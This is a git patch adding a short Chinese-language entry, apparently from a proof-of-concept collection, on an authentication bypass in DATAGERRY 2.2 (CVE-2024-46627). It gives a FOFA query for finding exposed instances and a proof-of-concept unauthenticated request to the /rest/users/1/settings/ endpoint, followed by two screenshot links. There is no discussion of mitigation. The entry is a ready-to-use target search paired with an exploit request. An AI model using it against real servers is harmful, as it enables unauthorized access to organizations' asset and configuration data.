From 762d1ca05bcab4ec469f4f69b5b7b3c8a093c8cc Mon Sep 17 00:00:00 2001 From: Marco <59686577+WebSafety-2tina@users.noreply.github.com> Date: Fri, 11 Oct 2024 23:29:36 +0800 Subject: [PATCH] =?UTF-8?q?Create=20DATAGERRY=20REST=20API=20=E8=BA=AB?= =?UTF-8?q?=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?(CVE-2024-46627).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...46\274\217\346\264\236(CVE-2024-46627).md" | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 "DATAGERRY/DATAGERRY REST API \350\272\253\344\273\275\351\252\214\350\257\201\347\273\225\350\277\207\346\274\217\346\264\236(CVE-2024-46627).md" diff --git "a/DATAGERRY/DATAGERRY REST API \350\272\253\344\273\275\351\252\214\350\257\201\347\273\225\350\277\207\346\274\217\346\264\236(CVE-2024-46627).md" "b/DATAGERRY/DATAGERRY REST API \350\272\253\344\273\275\351\252\214\350\257\201\347\273\225\350\277\207\346\274\217\346\264\236(CVE-2024-46627).md" new file mode 100644 index 00000000..4d12f177 --- /dev/null +++ "b/DATAGERRY/DATAGERRY REST API \350\272\253\344\273\275\351\252\214\350\257\201\347\273\225\350\277\207\346\274\217\346\264\236(CVE-2024-46627).md" @@ -0,0 +1,22 @@ +# DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627) + +DATAGERRY是DATAGerry开源的一个开源 CMDB 和资产管理工具。DATAGERRY 2.2版本存在安全漏洞,该漏洞源于存在不正确权限改造,允许攻击者通过精心设计的Web请求绕过权限验证而执行任意命令。 + +## fofa + +```javascript +title="datagerry" +``` + +## poc + +```javascript +使用浏览器请求 +http://x.x.x.x/rest/users/1/settings/ +``` + +![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayZEcvDCD9ZyvQsiazHy93onsEwibwTxOpUdOlibggicpUTe1zK33DonibzZg/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1) + + +![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayeAddRKdNr6NiaDNnbicSibT9iapIMV75HbdicG8feHLBTytTVM7lVIdT0icw/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1) +